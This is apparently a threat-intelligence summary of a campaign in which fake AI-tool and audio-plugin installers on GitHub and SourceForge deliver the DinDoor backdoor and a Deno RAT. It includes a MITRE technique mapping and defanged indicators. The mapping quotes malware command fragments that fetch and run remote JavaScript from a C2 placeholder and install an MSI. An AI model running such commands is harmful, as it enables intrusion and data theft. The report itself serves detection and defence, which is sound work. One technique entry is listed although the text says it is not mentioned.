Attackers are abusing GitHub, SourceForge, and compromised YouTube channels to distribute fake installers and plugins impersonating popular software such as ChatGPT, Claude, AutoTune, and Kontakt. The campaign delivers DinDoor and a Deno-based RAT that uses alternative JavaScript runtimes, Scoop, and WinGet to install payloads, steal data, and hide traffic through Microsoft Edge. #DinDoor #Deno #GitHub #SourceForge #YouTube #Scoop #WinGet #MicrosoftEdge
Keypoints
- Threat hunters identified fake installers and plugins on GitHub and SourceForge that impersonate popular software to lure victims.
- Compromised YouTube channels are used to promote malicious links, with some videos reaching more than 50,000 views.
- The infection chain often starts with MSI files or PowerShell scripts that download and execute further stages.
- The campaign installs Deno through Scoop or WinGet and then uses Deno to run a backdoor known as DinDoor.
- DinDoor can establish persistence, contact C2 servers, and deliver additional malware payloads, including a Deno-based RAT.
- The RAT can exfiltrate browser, wallet, Telegram, Discord, clipboard, screenshot, and file data, and supports VNC and SOCKS5 over WebSocket.
- Attackers are also abusing Microsoft Edge in a peer-to-peer streaming mode to conceal malicious traffic and reduce detection.
MITRE Techniques
- [T1195.002] Compromise Software Supply Chain – Attackers abused legitimate-looking GitHub and SourceForge projects to deliver fake installers and plugins, misleading users into installing malicious files [‘fake installers and plugins on GitHub and SourceForge’]
- [T1105] Ingress Tool Transfer – The malware downloaded MSI files and follow-on JavaScript payloads from remote repositories and C2 endpoints [‘downloads the MSI from GitHub’ / ‘downloads the next stage’]
- [T1059.001] PowerShell – PowerShell scripts were used to launch the infection chain, install software, and execute payloads [‘execute a malicious command’ / ‘the PowerShell script takes care of’]
- [T1059.007] JavaScript – Deno was used to execute JavaScript payloads for the backdoor and RAT [‘the Deno JavaScript runtime’ / ‘run -A http://{C2}/{random_path}.js’]
- [T1218.007] Msiexec – The malicious MSI was installed using the Windows installer utility [‘msiexec /i %temp%s.msi’]
- [T1574.009] Path Interception by PATH Environment Variable – The infection chain leveraged package managers and installed components in user-controlled locations to facilitate execution [‘installs Deno via WinGet or Scoop if not present’]
- [T1547.001] Registry Run Keys / Startup Folder – Persistence was achieved by creating a Run key that launches the downloader again [‘create a RUN key that executes the downloader “launcher-1”’]
- [T1106] Native API – The malware used native browser and system functionality through CDP and WebSocket-enabled components to control the victim environment [‘connects to it via Chrome DevTools Protocol (CDP)’]
- [T1027] Obfuscated Files or Information – Config data was Base64-encoded to conceal parameters and tokens [‘The config data is Base64-encoded’]
- [T1041] Exfiltration Over C2 Channel – Stolen data was sent back through HTTP and WebSocket C2 endpoints [‘receive config parameters, task delivery, results, and exfiltrated data’]
- [T1090.001] Internal Proxy – The RAT established SOCKS5 proxy tunnels over WebSocket [‘Establish SOCKS5 proxy tunnels over WebSocket’]
- [T1021.005] VNC – The RAT provided full bidirectional control through a custom VNC implementation over WebSocket [‘Full bidirectional control through a custom VNC implementation over WebSocket’]
- [T1123] Audio Capture – Not mentioned
Indicators of Compromise
- [URLs ] Malicious repositories and project pages used for distribution – https[:]//github.com/claude-free-plugin/, https[:]//sourceforge.net/projects/gearup/, and other listed GitHub/SourceForge URLs
- [Domains ] Distribution and C2 infrastructure – claudescript[.]top, ms-telemetry-gateway-us[.]com, and other listed domains such as cf-proxy[.]cloud-analytics-services[.]workers.dev
- [IPs ] C2 servers – 23[.]227[.]196[.]107, 45[.]137[.]99[.]121, and other listed IPs including 193[.]233[.]198[.]132
- [File names ] Malicious installers and scripts – install.msi, s.msi, and {Random name}.ps1
- [File paths / endpoints ] C2 and stage-fetching paths – /security-pool, /v2{ID}.js, /health, /token, and /vnc/agent/
- [Software / package identifiers ] Payload delivery and installation targets – DenoLand.Deno, Scoop, WinGet, and build note BWR